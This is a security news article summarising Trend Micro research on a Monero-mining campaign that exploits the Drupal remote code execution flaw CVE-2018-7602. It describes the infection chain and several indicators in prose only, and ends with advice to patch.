Cybercriminals are delivering Monero-mining malware designed to turn entire systems into mining bots via a Drupal vulnerability that was patched back in April of this year.
Trend Micro researchers observed a series of network attacks during which threat actors were exploiting CVE-2018-7602, a remote code execution (RCE) vulnerability affecting Drupal versions 7 and 8, according to a June 21 blog post.
An attacker who has successfully exploited this vulnerability has elevated the permission to modify or delete the content on the Drupal run site. Researchers noted that while attackers are exploiting the vulnerability to mine cryptocurrency now, it could be used as a doorway to other threats.
The attacks are notable because they employ the HTTP 1.0 POST method to send data back in SEND_DATA() function.
“HTTP 1.0 traffic is quite uncommon in these kinds of attacks, as most of the HTTP traffic by many organizations is already in HTTP 1.1 or later,” researchers said in the post. “And given this seeming variance, we foresee this as a pattern in future attacks”
Attackers are downloading a shell script which then retrieves an Executable and Linkable Format-based (ELF) downloader. The downloader will then add a crontab entry to automatically update itself, researchers said in the post. In Unix-based systems, this contains the commands to be executed, and in the case observed by researchers, the command is to check the link from which it downloads and interprets a script named up.jpg posing as a JPEG file.
“The ELF-based downloader also retrieves a Monero-mining malware (COINMINER_TOOLXMR.O-ELF64) and installs it on the affected machine,” the post said.
The miner malware is installed in the machine using the open-source XMRig and checks if the machine has already been compromised when the miner starts to run the malware changes its name to [^$I$^] and accesses the file /tmp/dvir.pi.
Researchers noted they had blocked 810 attacks in the last month from the malicious IP address spreading the malware and that the bulk of attacks from this IP address exploit the Heartbleed vulnerability.
Users are advised to update their systems as soon as possible and ensure they remain patched in order to prevent infection.